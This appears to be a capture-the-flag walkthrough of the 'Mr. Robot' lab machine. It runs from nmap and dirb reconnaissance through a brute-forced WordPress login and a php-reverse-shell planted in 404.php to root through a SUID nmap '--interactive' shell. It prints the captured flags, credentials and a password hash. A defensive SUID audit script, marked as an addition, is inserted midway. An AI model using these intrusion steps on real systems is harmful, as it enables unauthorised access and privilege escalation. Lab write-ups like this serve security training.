Information gathering
Scan for the target IP
┌──(root㉿kali)-[~]
└─# **arp-scan -l**
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b7:88:30, IPv4: 192.168.59.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.59.1 00:50:56:c0:00:08 VMware, Inc.
192.168.59.2 00:50:56:f9:c9:00 VMware, Inc.
192.168.59.135 00:0c:29:9e:37:57 VMware, Inc.
192.168.59.254 00:50:56:ff:0b:a0 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.503 seconds (102.28 hosts/sec). 4 responded
Port scan
┌──(root㉿kali)-[~]
└─# **nmap -sS -sV -n -T4 -p- 192.168.59.135**
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-26 09:01 EDT
Nmap scan report for 192.168.59.135
Host is up (0.00060s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
MAC Address: 00:0C:29:9E:37:57 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.41 seconds
nmap -sS -sV -n -T4 -p- 192.168.59.135
- -sS: SYN scan (the default TCP scan type).
- -sV: enable service/version detection.
- -A: perform service detection, script scanning and OS detection at once.
- -T 0-5: set the timing template, levels 0 to 5; the lower the level, the slower but stealthier the scan.
- -p-: scan all ports.
- -n: stop nmap from doing reverse DNS lookups and scan the supplied IP address directly.
- -O: enable OS detection.
┌──(root㉿kali)-[~]
└─# **nmap -p- -A -T4 192.168.59.135**
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-26 09:16 EDT
Nmap scan report for 192.168.59.135
Host is up (0.00065s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
MAC Address: 00:0C:29:9E:37:57 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 3.2 - 4.9 (94%), Linux 3.2 - 3.8 (93%), Linux 3.18 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.16 (91%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.59.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.73 seconds
┌──(root㉿kali)-[~]
└─# **dirb http://192.168.59.135**
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 26 09:22:07 2024
URL_BASE: http://192.168.59.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.59.135/ ----
==> DIRECTORY: http://192.168.59.135/0/
==> DIRECTORY: http://192.168.59.135/admin/
+ http://192.168.59.135/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.135/audio/
==> DIRECTORY: http://192.168.59.135/blog/
==> DIRECTORY: http://192.168.59.135/css/
+ http://192.168.59.135/dashboard (CODE:302|SIZE:0)
+ http://192.168.59.135/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/feed/
==> DIRECTORY: http://192.168.59.135/image/
==> DIRECTORY: http://192.168.59.135/Image/
==> DIRECTORY: http://192.168.59.135/images/
+ http://192.168.59.135/index.html (CODE:200|SIZE:1188)
+ http://192.168.59.135/index.php (CODE:301|SIZE:0)
+ http://192.168.59.135/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.59.135/js/
+ http://192.168.59.135/license (CODE:200|SIZE:19930)
+ http://192.168.59.135/login (CODE:302|SIZE:0)
+ http://192.168.59.135/page1 (CODE:301|SIZE:0)
+ http://192.168.59.135/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.59.135/rdf (CODE:301|SIZE:0)
+ http://192.168.59.135/readme (CODE:200|SIZE:7334)
**+ http://192.168.59.135/robots (CODE:200|SIZE:41)**
**+ http://192.168.59.135/robots.txt (CODE:200|SIZE:41)**
+ http://192.168.59.135/rss (CODE:301|SIZE:0)
+ http://192.168.59.135/rss2 (CODE:301|SIZE:0)
+ http://192.168.59.135/sitemap (CODE:200|SIZE:0)
+ http://192.168.59.135/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/video/
==> DIRECTORY: http://192.168.59.135/wp-admin/
+ http://192.168.59.135/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/wp-content/
+ http://192.168.59.135/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.135/wp-includes/
+ http://192.168.59.135/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.59.135/wp-load (CODE:200|SIZE:0)
**+ http://192.168.59.135/wp-login (CODE:200|SIZE:2754)**
+ http://192.168.59.135/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.59.135/wp-settings (CODE:500|SIZE:0)
+ http://192.168.59.135/wp-signup (CODE:302|SIZE:0)
+ http://192.168.59.135/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.59.135/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.59.135/0/ ----
+ http://192.168.59.135/0/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.135/0/feed/
+ http://192.168.59.135/0/index.php (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rdf (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rss (CODE:301|SIZE:0)
+ http://192.168.59.135/0/rss2 (CODE:301|SIZE:0)
^C> Testing: http://192.168.59.135/0/unreg
dirsearch -u http://192.168.59.135
Everything was scanned; this is the second tool, and scanning ends here for now.
Analysing the files one by one reveals the first key.
key-1
073403c8a58a1f80d943455fb30724b9
Threat modeling and vulnerability analysis
The first packet capture failed: I had switched the proxy port earlier and forgot to point the browser plugin at 8081.
Send the captured request to the attack module and open the settings.
Start the attack and look for responses with a different length; the wordlist used is the one supplied by the target machine.
Credentials obtained: Elliot/ER28-0652
Exploitation
Location of the webshell scripts
┌──(root㉿kali)-[~]
└─# **locate webshell**
/usr/bin/webshells
/usr/share/webshells
/usr/share/applications/kali-webshells.desktop
/usr/share/doc/webshells
/usr/share/doc/metasploit-framework/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
/usr/share/doc/metasploit-framework/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
/usr/share/doc/metasploit-framework/modules/exploit/multi/http/sugarcrm_webshell_cve_2023_22952.md
/usr/share/doc/metasploit-framework/modules/exploit/unix/http/pfsense_diag_routes_webshell.md
/usr/share/doc/metasploit-framework/modules/exploit/unix/http/pfsense_pfblockerng_webshell.md
/usr/share/doc/webshells/changelog.gz
/usr/share/doc/webshells/copyright
/usr/share/icons/Flat-Remix-Blue-Dark/apps/scalable/kali-webshells.svg
/usr/share/icons/Flat-Remix-Blue-Dark/apps/scalable/webshells.svg
/usr/share/icons/hicolor/16x16/apps/kali-webshells.png
/usr/share/icons/hicolor/22x22/apps/kali-webshells.png
/usr/share/icons/hicolor/24x24/apps/kali-webshells.png
/usr/share/icons/hicolor/256x256/apps/kali-webshells.png
/usr/share/icons/hicolor/32x32/apps/kali-webshells.png
/usr/share/icons/hicolor/48x48/apps/kali-webshells.png
/usr/share/icons/hicolor/scalable/apps/kali-webshells.svg
/usr/share/kali-menu/applications/kali-webshells.desktop
/usr/share/metasploit-framework/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb
/usr/share/metasploit-framework/modules/exploits/unix/http/pfsense_diag_routes_webshell.rb
/usr/share/metasploit-framework/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
/usr/share/webshells/asp
/usr/share/webshells/aspx
/usr/share/webshells/cfm
/usr/share/webshells/jsp
/usr/share/webshells/laudanum
/usr/share/webshells/perl
/usr/share/webshells/php
/usr/share/webshells/asp/cmd-asp-5.1.asp
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
/usr/share/webshells/cfm/cfexec.cfm
/usr/share/webshells/jsp/cmdjsp.jsp
/usr/share/webshells/jsp/jsp-reverse.jsp
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/perl/perlcmd.cgi
/usr/share/webshells/php/findsocket
/usr/share/webshells/php/php-backdoor.php
**/usr/share/webshells/php/php-reverse-shell.php**
/usr/share/webshells/php/qsd-php-backdoor.php
/usr/share/webshells/php/simple-backdoor.php
/usr/share/webshells/php/findsocket/findsock.c
/usr/share/webshells/php/findsocket/php-findsock-shell.php
/var/lib/dpkg/info/webshells.list
/var/lib/dpkg/info/webshells.md5sums
/var/lib/dpkg/info/webshells.postinst
/var/lib/dpkg/info/webshells.prerm
Use the php-reverse-shell script for the reverse shell: change the IP to the local (Kali) address, then just listen with nc.
┌──(root㉿kali)-[~]
└─# mkdir r1
┌──(root㉿kali)-[~]
└─# cd r1
┌──(root㉿kali)-[~/r1]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
Open php-reverse-shell, change the IP address to Kali's address, and upload the code into WordPress's 404.php page.
python -c "import pty;pty.spawn('/bin/bash')"
switches to a bash shell. Look for the home directory, then find the robot user: the second key is there along with a password file, but there is no permission to read the key.
daemon@linux:/$ ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
daemon@linux:/$ cd home
cd home
daemon@linux:/home$ ls
ls
robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt password.raw-md5
daemon@linux:/home/robot$ cat ke
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat pass
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
Log in to the robot account and view the second key.
robot@linux:~$ cd ~
cd ~
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat k
cat key-2-of-3.txt
**822c73956184f694993bede3eb39f959 // second key**
robot@linux:~$ cat p
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Post-exploitation
sudo privilege escalation
Then whoami, id and uname -a
show that the privileges are low, so escalation is needed.
find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \; # search for SUID binaries
find / -perm -u=s -type f 2>/dev/null
daemon@linux:/$ **find / -perm -u=s -type f 2>/dev/null**
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
nmap is found here; it can be used for privilege escalation.
GTFOBins: https://gtfobins.github.io/gtfobins/nmap/
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
**sudo nmap --interactive**
**nmap> !sh**
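As an added defensive counterpart to the SUID hunt above (this is not part of the original write-up): a small POSIX sh audit that compares the SUID binaries on a host against an expected baseline, so that a stray SUID nmap like the one found here gets flagged. The baseline and the sample listing are constructed from the page's own find output; adjust the baseline for your own image.

```shell
#!/bin/sh
# Constructed baseline of SUID binaries expected on a stock install (built from the
# page's find output; /usr/local/bin/nmap and the vmware wrappers are intentionally
# excluded so they show up as findings). Tune this list per image.
EXPECTED_SUID='/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown'

# unexpected_suid: read SUID paths on stdin (one per line) and print those
# that are not in the baseline (exact, whole-line, fixed-string match).
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$EXPECTED_SUID" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# live_suid_audit: enumerate SUID files the same way the write-up does,
# then filter them against the baseline. Run as root for full coverage.
live_suid_audit() {
    find / -perm -4000 -type f 2>/dev/null | unexpected_suid
}

# Constructed sample listing mirroring the page's find output, so the
# filter can be exercised offline without touching the real filesystem.
SAMPLE_LISTING='/bin/ping
/bin/su
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper'

# audit_sample: run the filter over the sample; returns flagged paths space-joined.
audit_sample() {
    printf '%s\n' "$SAMPLE_LISTING" | unexpected_suid | tr '\n' ' ' | sed 's/ *$//'
}
```

Anything this reports should be either removed from the SUID set (chmod u-s) or added to the baseline with a justification; a SUID copy of a tool that can spawn a shell, like nmap in interactive mode, is never a justified entry.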
Escalate, log in to the root account, and find the third key.
robot@linux:/$ nmap -V
nmap -V
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:/$ **nmap --interactive**
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> **!sh**
!sh
#
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
// now running as root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
**04787ddef27c3dee1ee161b21670b4e4 // third key**